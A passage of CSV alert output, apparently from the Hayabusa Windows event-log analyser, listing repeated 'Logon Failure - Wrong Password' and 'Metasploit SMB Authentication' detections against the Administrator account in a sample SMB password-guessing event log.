NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BJs7tuZpsPMYJHOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LUT5oe2DwS5vW84K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3OTe0uiDHhf5GzRL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 71TuxFRZFyZEQp1S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRvTmizOLj3UUpD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LnQEZPWaN2OkpTLa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: HnHR9DAtgzu561sx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DfBl3dbluZ7GiFum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Hlgn7gsZwRvlXAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eyHVPtGpnmmRjJuO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F0l3QC0rLt9yGaIe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XfEng3JgXLmgI8GN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ORIegzlkHy8AX6RW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AzS4xRnHKxSwz5sZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v0hA1XvRIlqwKG6g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mKXKkvlHvjRh33Vw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: JIMTGRC5IQlkrG9c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NYcLsxwbg8LkGCuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kmttijRBtXqEbU0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXC3hYI1Gin59gvG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hQiozAIr9Jgklmks : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O598IvZRpbdU1liO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xlmYWrAnn3sUNSRk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aAAkO0uOGIq8zVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 26K4BIpgUbBNWbDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: moW3Ts7edqoQ9XeU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: l8C4d3xE0QkWywbf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K1EgYFhtgrcjtcXM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7avpgQeA0KCIme9Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YFgmt3OEw4cDfPhG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OqITdE5K63nJg9tg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zBs4fYCiprxgDd43 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtBD0Q2szeURxMYA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KPUi2NhPP92Rs3hy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PrbMf9E0fOuwIB8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 807zsxQ9WETO9YIp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ZGMJKRYUlmijJV40 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xv33to031A0fQzX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IT0bzycur7HXFeLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kyY2K7tT0HgQ1ZL3 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6aexuFPH6FyEZ1bN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o8Iojas6sznqlYUE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U2SnliYkmx59ACSM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2plWY1GZHilHv5Vh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XIfmqihMJdPVz80p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Odg692Eyde8md0t7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
